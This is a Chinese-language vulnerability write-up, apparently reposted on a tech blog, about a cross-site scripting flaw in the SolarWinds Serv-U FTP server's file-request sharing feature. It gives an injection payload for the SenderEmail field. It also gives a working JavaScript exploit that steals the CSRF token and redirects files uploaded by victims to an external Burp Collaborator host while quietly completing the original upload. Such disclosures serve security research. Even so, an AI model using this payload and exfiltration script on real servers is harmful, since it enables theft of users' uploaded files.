网站首页 > 开源技术 正文
概述
研究人员在 SolarWinds Serv-U FTP 服务器中发现了一个有趣的漏洞。尽管初始向量需要身份验证,但低权限用户能够创建可公开访问的URL,当受害者访问该URL时将触发XSS有效载荷。
Serv-U包含两个功能来发送和接收来自其他用户的文件,在测试“请求文件”功能时,研究人员注意到发件人电子邮件输入被放置在可公开访问的共享URL中时没有被编码。这意味着攻击者可以向受害者发送一个共享URL来触发XSS漏洞。
漏洞复现
以下步骤是在Serv-U 15.2.3版本上测试的,通过身份验证后,用户可以转到“请求文件”选项卡以生成文件请求URL,如下图所示:
使用虚拟数据并发送请求,会显示可公开访问的共享URL:
检查生成的URL会显示文件上传表单。在此处上传的文件将被发送回链接创建者的Serv-U文件夹。
现在,如果我们修改原始链接生成请求,并在“SenderEmail”字段中包含一个XSS 有效载荷,例如"'/><script>alert(7)%3b</script>%40localhost.local。
然后从响应中获取“ShareURL”。
这样一来,就成功在可公开访问的共享URL上获得XSS了。
漏洞利用
由于漏洞利用使用了Ajax异步调用,因此我们需要稍作调整才能将文件正确上传到 Serv-U同时发送出去。脚本可以简单地托管,然后使用<script>标签通过XSS注入。简而言之,具体步骤如下:
从页面抓取当前CSRF令牌
重写“SubmitForm”函数,改为发布到外部主机
调用Ajax方法将文件POST到原始Serv-U主机,以确保满足原始承诺
var csrftoken = $('script').text().match(/(&CsrfToken='+")(.*?)";/)[2];
function SubmitForm(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {
var bSubmitted = false;
SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual);
if (rForm != null && rForm != undefined && rFormsTargetFrame != null && rFormsTargetFrame != undefined && sFileName != undefined && sFileName != null && sFileName != '' && nTransferID > 0) {
if (bIsVirtual == undefined || bIsVirtual == null)
bIsVirtual = 0;
var sAction = 'http://SOMEURL.burpcollaborator.net/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken;
rForm.setAttribute('action', sAction);
rFormsTargetFrame.onload = null;
rFormsTargetFrame.src = '/Web Client/Share/MultipleFileUploadResetFrame.htm';
rForm.submit();
bSubmitted = true;
} else
ASSERT('Cannot submit form because function parameters are invalid.');
return bSubmitted;
}
function SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {
jQuery.ajax({
url: '/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken,
data: new FormData(rForm),
cache: false,
contentType: false,
processData: false,
method: 'POST'
});
}
- 上一篇: java软件工程师的简历内容怎么填写
- 下一篇: Spring Boot实现大文件的分片上传功能?
猜你喜欢
- 2024-10-20 项目实训及课程设计指导——Web表示层典型功能实现的应用实例
- 2024-10-20 前端开发中常用的JS插件大集合(前端插件是什么意思)
- 2024-10-20 JavaScript—异步提交表单的6种方式
- 2024-10-20 公司员工工作日志办公系统+vue(员工工作日志模板)
- 2024-10-20 springboot:实现文件上传下载实时进度条功能【附带源码】
- 2024-10-20 Web开发者必备,有点酷的文件上传库!——Bootstrap-Fileinput
- 2024-10-20 图片MD5秒传、分片上传和断点续传
- 2024-10-20 一文看懂Ajax,学习前端开发的同学不可错过
- 2024-10-20 Spring Boot实现大文件的分片上传功能?
- 2024-10-20 java软件工程师的简历内容怎么填写
欢迎 你 发表评论:
- 最近发表
- 标签列表
-
- jdk (81)
- putty (66)
- rufus (78)
- 内网穿透 (89)
- okhttp (70)
- powertoys (74)
- windowsterminal (81)
- netcat (65)
- ghostscript (65)
- veracrypt (65)
- asp.netcore (70)
- wrk (67)
- aspose.words (80)
- itk (80)
- ajaxfileupload.js (66)
- sqlhelper (67)
- express.js (67)
- phpmailer (67)
- xjar (70)
- redisclient (78)
- wakeonlan (66)
- tinygo (85)
- startbbs (72)
- webftp (82)
- vsvim (79)
本文暂时没有评论,来添加一个吧(●'◡'●)